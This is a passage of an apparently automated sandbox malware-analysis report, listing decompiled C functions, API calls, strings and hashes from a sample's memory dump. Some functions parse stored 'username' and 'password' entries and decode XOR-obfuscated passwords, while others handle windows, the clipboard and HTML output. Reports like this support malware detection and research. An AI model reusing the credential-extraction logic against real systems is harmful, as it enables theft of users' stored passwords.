                                0x00408ff7
                                0x0040900d
                                0x00409016
                                0x0040901b
                                0x00000000
                                0x00409029
                                0x0040902a

                                APIs
                                  • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                • _mbscpy.MSVCRT ref: 00408FD6
                                • _mbscpy.MSVCRT ref: 00408FE6
                                • GetPrivateProfileIntA.KERNEL32(0041E308,rtl,00000000,0041E200), ref: 00408FF7
                                • GetPrivateProfileStringA.KERNEL32(0041E308,charset,00417C88,0041E350,0000003F,0041E200), ref: 00409022
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: PrivateProfile_mbscpy$AttributesFileString
                                • String ID: charset$general$rtl
                                • API String ID: 888011440-3784062100
                                • Opcode ID: 55f41d98300eda273b6a0d0ace1f1b61fb276ed63f1592d27e33da27b08274f9
                                • Instruction ID: ef4fb33988e1ec7767552a7ed3f3ae2affcfc9826048e3bb16e6b0e4c8ee98e3
                                • Opcode Fuzzy Hash: 55f41d98300eda273b6a0d0ace1f1b61fb276ed63f1592d27e33da27b08274f9
                                • Instruction Fuzzy Hash: 2CF0B43568020879E3111712AC0AFFB6E68EB86F11F18843FBC14921D1D67D494185AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00405865, Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 202stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 78%
                                			E00405865(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				char* _v12;
				intOrPtr* _v16;
				int _v20;
				char _v22;
				char _v23;
				signed int _v24;
				int _v28;
				int _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void _v172;
				char _v300;
				char _v1319;
				char _v1320;
				char _v1321;
				char _v1322;
				void _v1323;
				char _v1324;
				void _v1547;
				void _v1580;
				void* __ebx;
				void* __edi;
				void* _t90;
				void* _t98;
				int _t106;
				signed int _t112;
				signed int _t118;
				void* _t119;
				intOrPtr* _t128;
				void* _t129;
				void* _t130;
				void* _t132;
				signed int _t136;
				int _t147;
				signed int* _t152;
				void* _t153;
				void* _t154;
				void* _t155;

				_t130 = __ecx;
				_v36 = 0;
				_v1324 = 0;
				memset( &_v1323, 0, 0x3ff);
				_v44 = 0xffff;
				_v40 = 0xffff;
				_v300 = 0;
				_v172 = 0;
				_v20 = 0;
				_v32 = 0;
				_v28 = 0;
				_t90 = E00407193(_a8, _t130,  &_v1324, 0x3ff,  &_v36);
				_t155 = _t154 + 0x18;
				while(_t90 != 0) {
					if(_v20 == _v44 + 2) {
						_push( &_v1323);
						_t129 = 0x7f;
						_v32 = 1;
						E00406958(_t129,  &_v300);
					}
					if(_v20 == _v40 + 2) {
						_v28 = 1;
						_t106 = strlen( &_v1324);
						if(_v1323 == 0x27) {
							_t24 = _t106 - 3; // -3
							if(_t24 <= 0x7c &&  *((char*)(_t153 + _t106 - 0x529)) == 0x27) {
								_t136 = 8;
								memcpy( &_v1580, 0x418128, _t136 << 2);
								asm("movsb");
								_t147 = 0;
								memset( &_v1547, 0, 0xdf);
								memset( &_v172, 0, 0x80);
								_t112 = _v1322;
								_t155 = _t155 + 0x24;
								if(_t112 != 0x27) {
									_v16 =  &_v1322;
									_v8 =  &_v1319;
									_t128 =  &_v1320;
									_v12 =  &_v1321;
									while(_t112 != 0) {
										if(_t112 != 0x5c) {
											_v12 = _v12 + 1;
											_v8 = _v8 + 1;
											_t152 = _t153 + _t147 - 0xa8;
											_t128 = _t128 + 1;
											_v16 = _v16 + 1;
											 *_t152 = _t112;
										} else {
											_t118 =  *_t128;
											if( *_v12 != 0x78) {
												if(_t118 == 0x66) {
													_t118 = _t118 + 0xa6;
												}
												if(_t118 == 0x72) {
													_t118 = _t118 + 0x9b;
												}
												if(_t118 == 0x30) {
													_t118 = 0;
												}
												if(_t118 == 0x6e) {
													_t118 = _t118 + 0x9c;
												}
												if(_t118 == 0x74) {
													_t118 = _t118 + 0x95;
												}
												if(_t118 == 0x76) {
													_t118 = _t118 + 0x95;
												}
												if(_t118 == 0x61) {
													_t118 = _t118 + 0xa6;
												}
												if(_t118 == 0x62) {
													_t118 = _t118 + 0xa6;
												}
												_t152 = _t153 + _t147 - 0xa8;
												_push(2);
											} else {
												_v24 = _t118;
												_v23 =  *_v8;
												_v22 = 0;
												_t152 = _t153 + _t147 - 0xa8;
												_t118 = E00406D5A( &_v24);
												_push(4);
											}
											 *_t152 = _t118;
											_pop(_t119);
											_v12 = _v12 + _t119;
											_v8 = _v8 + _t119;
											_t128 = _t128 + _t119;
											_v16 = _v16 + _t119;
										}
										 *_t152 =  *(_t153 + _t147 - 0x628) ^  *_t152 ^ 0x00000031;
										_t112 =  *_v16;
										_t147 = _t147 + 1;
										if(_t112 != 0x27) {
											continue;
										}
										goto L33;
									}
								}
							}
						}
					}
					L33:
					if(_v32 != 0 && _v28 != 0) {
						 *((intOrPtr*)( *_a4))( &_v300);
						_v32 = 0;
						_v28 = 0;
						_v172 = 0;
						_v300 = 0;
					}
					if(E004070E4( &_v1324, ?str?) >= 0) {
						_v44 = _v20;
					}
					_t98 = E004070E4( &_v1324, "S'password'");
					_pop(_t132);
					if(_t98 >= 0) {
						_v40 = _v20;
					}
					_v20 = _v20 + 1;
					_t90 = E00407193(_a8, _t132,  &_v1324, 0x3ff,  &_v36);
					_t155 = _t155 + 0xc;
				}
				return _t90;
			}











































                                0x00405865
                                0x00405881
                                0x00405884
                                0x0040588a
                                0x00405894
                                0x00405897
                                0x004058a4
                                0x004058aa
                                0x004058b1
                                0x004058b4
                                0x004058b7
                                0x004058be
                                0x004058c3
                                0x00405ad9
                                0x004058d4
                                0x004058dc
                                0x004058df
                                0x004058e6
                                0x004058ed
                                0x004058f2
                                0x004058fc
                                0x00405909
                                0x00405910
                                0x0040591d
                                0x00405923
                                0x00405929
                                0x0040593f
                                0x0040594b
                                0x0040594d
                                0x00405953
                                0x0040595d
                                0x0040596f
                                0x00405974
                                0x0040597a
                                0x0040597f
                                0x0040598b
                                0x00405994
                                0x0040599d
                                0x004059a3
                                0x004059a6
                                0x004059b0
                                0x00405a29
                                0x00405a2c
                                0x00405a2f
                                0x00405a36
                                0x00405a37
                                0x00405a3a
                                0x004059b2
                                0x004059b8
                                0x004059ba
                                0x004059e2
                                0x004059e4
                                0x004059e4
                                0x004059e8
                                0x004059ea
                                0x004059ea
                                0x004059ee
                                0x004059f0
                                0x004059f0
                                0x004059f4
                                0x004059f6
                                0x004059f6
                                0x004059fa
                                0x004059fc
                                0x004059fc
                                0x00405a00
                                0x00405a02
                                0x00405a02
                                0x00405a06
                                0x00405a08
                                0x00405a08
                                0x00405a0c
                                0x00405a0e
                                0x00405a0e
                                0x00405a10
                                0x00405a17
                                0x004059bc
                                0x004059bc
                                0x004059c4
                                0x004059cb
                                0x004059cf
                                0x004059d6
                                0x004059dc
                                0x004059dc
                                0x00405a19
                                0x00405a1b
                                0x00405a1c
                                0x00405a1f
                                0x00405a22
                                0x00405a24
                                0x00405a24
                                0x00405a47
                                0x00405a4c
                                0x00405a4e
                                0x00405a51
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00405a51
                                0x004059a6
                                0x0040597f
                                0x00405929
                                0x0040591d
                                0x00405a57
                                0x00405a5c
                                0x00405a6f
                                0x00405a71
                                0x00405a74
                                0x00405a77
                                0x00405a7e
                                0x00405a7e
                                0x00405a98
                                0x00405a9d
                                0x00405a9d
                                0x00405aab
                                0x00405ab2
                                0x00405ab3
                                0x00405ab8
                                0x00405ab8
                                0x00405abe
                                0x00405ad1
                                0x00405ad6
                                0x00405ad6
                                0x00405ae5

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$strlen
                                • String ID: '$'$S'password'$S'username'
                                • API String ID: 3337090206-859024053
                                • Opcode ID: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
                                • Instruction ID: 095c589e2a809376e97825867b0f887a5e853f6b8f709b3ead32f3d6acc6b9c2
                                • Opcode Fuzzy Hash: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
                                • Instruction Fuzzy Hash: A5716071D0065DAECF21DB94C881BEFBBB4EF1A314F5041ABD444B7282D6385A8A8F59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040AC28, Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E0040AC28(void* __eax) {
				void* _v36;
				long _v40;
				intOrPtr _v44;
				intOrPtr _v52;
				void* _v68;
				long _t21;
				void* _t24;
				long _t26;
				long _t34;
				long _t37;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;

				_t40 =  *0x415030; // 0x74191ab0
				_t47 = __eax;
				_t44 =  *0x415040; // 0x74192040
				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
					_t37 =  *_t40(0x10, 0x10, 0x19, 1, 1);
					 *(__eax + 0x18c) = _t37;
					 *_t44(_t37, 1);
					SendMessageA( *(__eax + 0x184), 0x1003, 1,  *(__eax + 0x18c));
				}
				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
					 *(_t47 + 0x190) = _t34;
					 *_t44(_t34, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
				}
				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
				 *(_t47 + 0x188) = _t21;
				 *_t44(_t21, 2);
				_v36 = LoadImageA( *0x41dbd4, 0x85, 0, 0x10, 0x10, 0x1000);
				_t24 = LoadImageA( *0x41dbd4, 0x86, 0, 0x10, 0x10, 0x1000);
				_t42 = _t24;
				 *_t44( *(_t47 + 0x188), 0);
				_t26 = GetSysColor(0xf);
				_t45 =  *0x41503c; // 0x741923b0
				_v40 = _t26;
				 *_t45( *(_t47 + 0x188), _v44, _t26);
				 *_t45( *(_t47 + 0x188), _t42, _v52);
				DeleteObject(_v68);
				DeleteObject(_t42);
				return SendMessageA(E00405068( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
			}


















                                0x0040ac2b
                                0x0040ac39
                                0x0040ac43
                                0x0040ac49
                                0x0040ac55
                                0x0040ac5a
                                0x0040ac60
                                0x0040ac75
                                0x0040ac75
                                0x0040ac7e
                                0x0040ac8a
                                0x0040ac8f
                                0x0040ac95
                                0x0040acaa
                                0x0040acaa
                                0x0040acb6
                                0x0040acbb
                                0x0040acc1
                                0x0040acf7
                                0x0040acfb
                                0x0040ad05
                                0x0040ad07
                                0x0040ad0b
                                0x0040ad11
                                0x0040ad1c
                                0x0040ad26
                                0x0040ad33
                                0x0040ad3f
                                0x0040ad42
                                0x0040ad68

                                APIs
                                • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040AC75
                                • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040ACAA
                                • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040ACDF
                                • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040ACFB
                                • GetSysColor.USER32(0000000F), ref: 0040AD0B
                                • DeleteObject.GDI32(?), ref: 0040AD3F
                                • DeleteObject.GDI32(00000000), ref: 0040AD42
                                • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040AD60
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: MessageSend$DeleteImageLoadObject$Color
                                • String ID:
                                • API String ID: 3642520215-0
                                • Opcode ID: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
                                • Instruction ID: 10adafa9a034a25fdfd439dfbbefb27d9cbe3ef8874ff0eb0b967345faf6b271
                                • Opcode Fuzzy Hash: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
                                • Instruction Fuzzy Hash: B8316171680708BFFA316B60DC47FD67695EB88B00F104829F3857A1E1CAF278909B58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D1D6, Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 77COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _strcmpi
                                • String ID: account$name$password$protocol
                                • API String ID: 1439213657-933060687
                                • Opcode ID: 9f4445d43ae643b9a2fe9e2fdb03cf84892fe8e67e04b4e06ad1d96e1e33e757
                                • Instruction ID: 794633c49b8c9c94e8125cdebcfe219ffcc263fe4270280c1a3d0952be7122e7
                                • Opcode Fuzzy Hash: 9f4445d43ae643b9a2fe9e2fdb03cf84892fe8e67e04b4e06ad1d96e1e33e757
                                • Instruction Fuzzy Hash: EA2130B2608702ADE718DE7598407D6F7D4BF05715F20022FE66CD2180FB39A554CB9D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B3FF, Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0040B3FF(void* __esi) {
				struct HDWP__* _v8;
				int _v12;
				intOrPtr _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _t32;
				int _t60;
				int _t65;

				if( *((intOrPtr*)(__esi + 0x140)) != 0) {
					GetClientRect( *(__esi + 0x108),  &_v32);
					GetWindowRect( *(__esi + 0x114),  &_v48);
					_t65 = _v48.bottom - _v48.top + 1;
					GetWindowRect( *(__esi + 0x118),  &_v48);
					_v12 = _v32.right - _v32.left;
					_t60 = _v48.bottom - _v48.top + 1;
					_v16 = _v32.bottom - _v32.top;
					_v8 = BeginDeferWindowPos(3);
					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x390)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
					return EndDeferWindowPos(_v8);
				}
				return _t32;
			}











                                0x0040b40c
                                0x0040b41e
                                0x0040b434
                                0x0040b446
                                0x0040b447
                                0x0040b455
                                0x0040b460
                                0x0040b461
                                0x0040b470
                                0x0040b481
                                0x0040b4a1
                                0x0040b4c8
                                0x00000000
                                0x0040b4d8
                                0x0040b4da

                                APIs
                                • GetClientRect.USER32(?,?), ref: 0040B41E
                                • GetWindowRect.USER32(?,?), ref: 0040B434
                                • GetWindowRect.USER32(?,?), ref: 0040B447
                                • BeginDeferWindowPos.USER32(00000003), ref: 0040B464
                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B481
                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B4A1
                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B4C8
                                • EndDeferWindowPos.USER32(?), ref: 0040B4D1
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Window$Defer$Rect$BeginClient
                                • String ID:
                                • API String ID: 2126104762-0
                                • Opcode ID: 0757be7f740c367b27a432adcadcbbd04f52c6bec85c836fbe865042ee467c30
                                • Instruction ID: fdc4126930c1b8f3c9151252813053957ee6f88c11e53af12b0e4d030a96b888
                                • Opcode Fuzzy Hash: 0757be7f740c367b27a432adcadcbbd04f52c6bec85c836fbe865042ee467c30
                                • Instruction Fuzzy Hash: CA21D672900609FFDF12CFA8DD89FEEBBB9FB48310F108464FA55A2160C7316A519B24
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004072B5, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 92%
                                			E004072B5(void* _a4) {
				void* _t7;
				signed int _t10;
				int _t12;
				void* _t16;
				signed int _t18;
				void* _t21;

				_t21 = _a4;
				_t18 = 0;
				EmptyClipboard();
				if(_t21 != 0) {
					_t2 = strlen(_t21) + 1; // 0x1
					_t12 = _t2;
					_t7 = GlobalAlloc(0x2000, _t12);
					_t16 = _t7;
					if(_t16 != 0) {
						GlobalFix(_t16);
						memcpy(_t7, _t21, _t12);
						GlobalUnWire(_t16);
						_t10 = SetClipboardData(1, _t16);
						asm("sbb esi, esi");
						_t18 =  ~( ~_t10);
					}
				}
				CloseClipboard();
				return _t18;
			}









                                0x004072b6
                                0x004072bb
                                0x004072bd
                                0x004072c5
                                0x004072d0
                                0x004072d0
                                0x004072d9
                                0x004072df
                                0x004072e3
                                0x004072e6
                                0x004072ef
                                0x004072f8
                                0x00407301
                                0x0040730b
                                0x0040730d
                                0x0040730d
                                0x00407310
                                0x00407311
                                0x0040731b

                                APIs
                                • EmptyClipboard.USER32 ref: 004072BD
                                • strlen.MSVCRT ref: 004072CA
                                • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040BB80,?), ref: 004072D9
                                • GlobalFix.KERNEL32(00000000), ref: 004072E6
                                • memcpy.MSVCRT ref: 004072EF
                                • GlobalUnWire.KERNEL32(00000000), ref: 004072F8
                                • SetClipboardData.USER32(00000001,00000000), ref: 00407301
                                • CloseClipboard.USER32 ref: 00407311
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
                                • String ID:
                                • API String ID: 2315226746-0
                                • Opcode ID: a78d69c54143d1a16fd49fb3941744d5e455784aa02fabf2be394f33c89f07e1
                                • Instruction ID: b56ddb85736e4a30ce9fec78ed7ee79c44370bf8c75140d3078b235505e53826
                                • Opcode Fuzzy Hash: a78d69c54143d1a16fd49fb3941744d5e455784aa02fabf2be394f33c89f07e1
                                • Instruction Fuzzy Hash: 7DF0B437A00619BBD3112BA1BC4CEDB7B2CDBC4B96B054179FE05D6152DA38980486F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A129, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                Download Yara Rule
                                C-Code - Quality: 26%
                                			E0040A129(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v48;
				char _v68;
				void _v96;
				signed int _t51;
				char* _t53;
				intOrPtr* _t61;
				intOrPtr* _t65;
				signed int _t66;
				intOrPtr _t80;
				intOrPtr* _t87;
				signed int _t91;
				void* _t92;
				void* _t93;

				_t65 = __ebx;
				_t66 = 6;
				memcpy( &_v96, 0x4183e4, _t66 << 2);
				_t93 = _t92 + 0xc;
				asm("movsw");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				E004067EC(_a4, "<tr>");
				_t91 = 0;
				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
					do {
						_t51 =  *( *((intOrPtr*)(_t65 + 0x24)) + _t91 * 4);
						_v8 = _t51;
						_t53 =  &_v96;
						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t65 + 0x34)) + 4)) == 0) {
							_t53 =  &_v48;
						}
						_t87 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t53;
						 *((intOrPtr*)( *_t65 + 0x30))(4, _t91, _t87,  &_v28);
						0x41241f(_v28,  &_v68);
						 *((intOrPtr*)( *_t87))(_v8,  *(_t65 + 0x4c));
						0x41244b();
						 *((intOrPtr*)( *_t65 + 0x48))( *((intOrPtr*)(_t65 + 0x50)), _t87, _v8);
						_t61 =  *((intOrPtr*)(_t65 + 0x50));
						_t80 =  *_t61;
						if(_t80 == 0 || _t80 == 0x20) {
							0x413cf4(_t61, "&nbsp;");
						}
						0x4124d4( *((intOrPtr*)(_t65 + 0x54)),  *((intOrPtr*)(_t65 + 0x50)));
						sprintf( *(_t65 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t65 + 0x54)));
						E004067EC(_a4,  *(_t65 + 0x4c));
						_t93 = _t93 + 0x20;
						_t91 = _t91 + 1;
					} while (_t91 <  *((intOrPtr*)(_t65 + 0x20)));
				}
				return E004067EC(_a4, 0x417de8);
			}






















                                0x0040a129
                                0x0040a133
                                0x0040a13c
                                0x0040a13c
                                0x0040a13e
                                0x0040a148
                                0x0040a149
                                0x0040a14a
                                0x0040a14b
                                0x0040a14c
                                0x0040a156
                                0x0040a157
                                0x0040a15c
                                0x0040a163
                                0x0040a169
                                0x0040a16c
                                0x0040a172
                                0x0040a17d
                                0x0040a180
                                0x0040a182
                                0x0040a182
                                0x0040a185
                                0x0040a188
                                0x0040a18c
                                0x0040a190
                                0x0040a194
                                0x0040a19e
                                0x0040a1a7
                                0x0040a1b1
                                0x0040a1c2
                                0x0040a1c7
                                0x0040a1d7
                                0x0040a1da
                                0x0040a1dd
                                0x0040a1e1
                                0x0040a1ee
                                0x0040a1f4
                                0x0040a1fe
                                0x0040a210
                                0x0040a21b
                                0x0040a220
                                0x0040a223
                                0x0040a224
                                0x0040a169
                                0x0040a23f

                                APIs
                                  • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                  • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                • _mbscat.MSVCRT ref: 0040A1EE
                                • sprintf.MSVCRT ref: 0040A210
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FileWrite_mbscatsprintfstrlen
                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                • API String ID: 1631269929-4153097237
                                • Opcode ID: 3523185fe67812ce5c4df5690e324f3de58a353957d607fc5cd479dc7c7c253a
                                • Instruction ID: f5ff55beaed6f71e33551b2c4209876a9ab5e20235427d51249a725151ce9b26
                                • Opcode Fuzzy Hash: 3523185fe67812ce5c4df5690e324f3de58a353957d607fc5cd479dc7c7c253a
                                • Instruction Fuzzy Hash: 68318231900209AFCF05DF54C8869DE7BB6FF44314F10416AFD11BB2A2DB76A955CB84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040876F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 15%
                                			E0040876F(signed short __ebx) {
				signed int _t17;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t34;
				signed short _t38;
				signed int _t39;
				signed int _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				int _t55;
				void* _t56;
				int _t66;
				void* _t67;
				void* _t68;

				_t38 = __ebx;
				if( *0x41e448 == 0) {
					E004086ED();
				}
				_t39 =  *0x41e440; // 0xa
				_t17 = 0;
				if(_t39 <= 0) {
					L5:
					_t50 = 0;
				} else {
					while(1) {
						_t48 =  *0x41e438; // 0xc1bff0
						if(_t38 ==  *((intOrPtr*)(_t48 + _t17 * 4))) {
							break;
						}
						_t17 = _t17 + 1;
						if(_t17 < _t39) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t46 =  *0x41e43c; // 0xc1c3f8
					_t50 =  *((intOrPtr*)(_t46 + _t17 * 4)) +  *0x41e430;
				}
				L6:
				if(_t50 != 0) {
					L22:
					_t18 = _t50;
				} else {
					if((_t38 & 0x00010000) == 0) {
						if( *0x41e200 == 0) {
							_t19 =  *0x41e450; // 0x1000
							_push(_t19 - 1);
							_push( *0x41e434);
							_push(_t38);
							_push(E004088C5());
							goto L16;
						} else {
							0x413d0c(0x41e308, "strings");
							_t30 = E00408BF9(_t38,  *0x41e434);
							_t56 = _t56 + 0x10;
							if(_t30 == 0) {
								L14:
								_t31 =  *0x41e450; // 0x1000
								_push(_t31 - 1);
								_push( *0x41e434);
								_push(_t38);
								goto L9;
							} else {
								_t55 = strlen( *0x41e434);
								if(_t55 == 0) {
									goto L14;
								}
							}
						}
					} else {
						_t34 =  *0x41e450; // 0x1000
						_push(_t34 - 1);
						_push( *0x41e434);
						_push(_t38 & 0x0000ffff);
						L9:
						_push( *0x41dbd4);
						L16:
						_t55 = LoadStringA();
						_t66 = _t55;
					}
					if(_t66 <= 0) {
						L21:
						_t18 = 0x417c88;
					} else {
						_t23 =  *0x41e444; // 0x64
						_t8 = _t55 + 2; // 0x66
						_t67 = _t23 + _t8 -  *0x41e448; // 0x8000
						if(_t67 >= 0) {
							goto L21;
						} else {
							_t41 =  *0x41e440; // 0xa
							_t68 = _t41 -  *0x41e44c; // 0x100
							if(_t68 >= 0) {
								goto L21;
							} else {
								_t42 =  *0x41e430; // 0xc13fe8
								_t50 = _t23 + _t42;
								_t10 = _t55 + 1; // 0x1
								memcpy(_t50,  *0x41e434, _t10);
								_t26 =  *0x41e440; // 0xa
								_t43 =  *0x41e444; // 0x64
								_t47 =  *0x41e43c; // 0xc1c3f8
								 *((intOrPtr*)(_t47 + _t26 * 4)) = _t43;
								_t27 =  *0x41e440; // 0xa
								_t44 =  *0x41e438; // 0xc1bff0
								 *(_t44 + _t27 * 4) = _t38;
								_t28 =  *0x41e444; // 0x64
								 *0x41e440 =  *0x41e440 + 1;
								 *0x41e444 = _t28 + _t55 + 1;
								if(_t50 != 0) {
									goto L22;
								} else {
									goto L21;
								}
							}
						}
					}
				}
				return _t18;
			}




























                                0x0040876f
                                0x00408776
                                0x00408778
                                0x00408778
                                0x0040877d
                                0x00408784
                                0x00408789
                                0x0040879b
                                0x0040879b
                                0x0040878b
                                0x0040878b
                                0x0040878b
                                0x00408794
                                0x00000000
                                0x00000000
                                0x00408796
                                0x00408799
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00408799
                                0x004087c6
                                0x004087cf
                                0x004087cf
                                0x0040879d
                                0x0040879f
                                0x004088c0
                                0x004088c0
                                0x004087a5
                                0x004087ab
                                0x004087de
                                0x00408824
                                0x0040882a
                                0x0040882b
                                0x00408831
                                0x00408837
                                0x00000000
                                0x004087e0
                                0x004087ea
                                0x004087f6
                                0x004087fb
                                0x00408800
                                0x00408814
                                0x00408814
                                0x0040881a
                                0x0040881b
                                0x00408821
                                0x00000000
                                0x00408802
                                0x0040880d
                                0x00408812
                                0x00000000
                                0x00000000
                                0x00408812
                                0x00408800
                                0x004087ad
                                0x004087ad
                                0x004087b3
                                0x004087b4
                                0x004087bd
                                0x004087be
                                0x004087be
                                0x00408838
                                0x0040883e
                                0x00408840
                                0x00408840
                                0x00408842
                                0x004088b9
                                0x004088b9
                                0x00408844
                                0x00408844
                                0x00408849
                                0x0040884d
                                0x00408853
                                0x00000000
                                0x00408855
                                0x00408855
                                0x0040885b
                                0x00408861
                                0x00000000
                                0x00408863
                                0x00408863
                                0x00408869
                                0x0040886c
                                0x00408877
                                0x0040887c
                                0x00408881
                                0x00408887
                                0x0040888d
                                0x00408890
                                0x00408895
                                0x0040889b
                                0x0040889e
                                0x004088a6
                                0x004088b2
                                0x004088b7
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x004088b7
                                0x00408861
                                0x00408853
                                0x00408842
                                0x004088c4

                                APIs
                                • _mbscpy.MSVCRT ref: 004087EA
                                  • Part of subcall function 00408BF9: _itoa.MSVCRT ref: 00408C1A
                                • strlen.MSVCRT ref: 00408808
                                • LoadStringA.USER32(00000000,00000006,00000FFF,?), ref: 00408838
                                • memcpy.MSVCRT ref: 00408877
                                  • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408715
                                  • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408733
                                  • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408751
                                  • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408761
                                Strings
                                • strings, xrefs: 004087E0
                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408783
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
